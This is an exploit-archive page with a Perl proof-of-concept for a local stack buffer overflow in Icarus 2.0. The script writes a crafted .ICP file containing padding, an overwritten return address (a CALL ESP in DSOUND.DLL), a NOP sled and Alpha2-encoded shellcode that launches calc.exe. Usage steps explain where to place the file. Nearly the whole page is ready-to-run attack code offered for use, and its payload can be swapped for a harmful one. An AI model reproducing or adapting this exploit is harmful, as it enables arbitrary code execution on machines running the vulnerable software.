Icarus 2.0 (.ICP File) Local Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Icarus 2.0 (.ICP File) Local Stack Overflow Exploit
# Published : 2009-07-14
# Author : [0]x80->[H]4x?20r
# Previous Title : AudioPLUS 2.00.215 (.m3u .lst) Universal SEH Overwrite Exploit
# Next Title : Live For Speed 2 Version Z .Mpr Local buffer Overflow Exploit
#!/usr/bin/perl
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
# Icarus 2.0  Local Stack-based Buffer overflow Exploit             			     #
# By : [0]x80->[H]4x?20r									     #
# Contact : hashteck[at]Gmail[dot]com						             #
# From : Morocco									     #
# PoC by : ThE g0bL!N									     #
#[+]--------------------------------------------------------------------------------------[+]#
# Program : Icarus 2.0  								     #
#[+]--------------------------------------------------------------------------------------[+]#
# Tested Under Win$hit 6.0 Vista Pro							     #
#[+]--------------------------------------------------------------------------------------[+]#
##############################################################################################
#####################################  Proud to be HACKER  ###################################
##############################################################################################
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
#											     #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
# Put the file generated by this exploit in Icarus Directory ( After you made a back up of   #
# the original file ) then launch Icarus.exe and b000m , calc.exe is launched                #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
#											     #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
# Note : The shellcode is encoded with Alpha2 . The program don't accept non-encoded 	     #
# Shellcode . I'm too lazy to figure that out now , i you find something contact me !	     #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#


$Header="server=" ;
$junk="x41" x 528;
$EIP = "x28x55x3Dx72"; # 0x723D5528 -- DSOUND.DLL -- CALL ESP
$NOPS = "x90" x 20 ;
# win32_exec -  EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
$shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x37x49".
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax4a".
"x58x50x30x42x30x42x6bx42x41x5ax41x42x32x42x41x32".
"x41x41x30x41x41x58x38x42x42x50x75x78x69x79x6cx4b".
"x58x71x54x53x30x65x50x35x50x4ex6bx33x75x67x4cx6e".
"x6bx51x6cx33x35x50x78x66x61x5ax4fx6ex6bx50x4fx32".
"x38x6cx4bx33x6fx41x30x35x51x48x6bx37x39x6cx4bx45".
"x64x6ex6bx56x61x7ax4ex56x51x6fx30x4cx59x4ex4cx4b".
"x34x4fx30x50x74x57x77x48x41x39x5ax76x6dx33x31x79".
"x52x6ax4bx6bx44x37x4bx42x74x74x64x55x54x50x75x6b".
"x55x4cx4bx61x4fx67x54x46x61x6ax4bx52x46x6ex6bx74".
"x4cx50x4bx4cx4bx53x6fx45x4cx76x61x38x6bx6ex6bx77".
"x6cx6cx4bx75x51x38x6bx6fx79x61x4cx54x64x75x54x6b".
"x73x56x51x4fx30x33x54x6ex6bx53x70x36x50x4cx45x6f".
"x30x53x48x54x4cx4cx4bx71x50x66x6cx6cx4bx32x50x47".
"x6cx6ex4dx4cx4bx70x68x45x58x7ax4bx77x79x4cx4bx6f".
"x70x4cx70x67x70x35x50x37x70x4cx4bx43x58x77x4cx43".
"x6fx74x71x59x66x63x50x42x76x6cx49x6ax58x4dx53x59".
"x50x61x6bx50x50x71x78x63x4ex48x58x39x72x51x63x32".
"x48x4fx68x4bx4ex6ex6ax46x6ex61x47x4bx4fx6ax47x73".
"x53x62x41x42x4cx55x33x67x70x4a";
#
#
#
open(myfile,'>>GUEST.ICP');
print myfile $Header.$junk.$EIP.$NOPS.$shellcode;

#----------------------------------------------------------------------------------#
# Welcome back Milw0rm & tnx to str0ke for his great j0b !!!11111oneleven11!!
#----------------------------------------------------------------------------------#

# www.Syue.com [2009-07-14]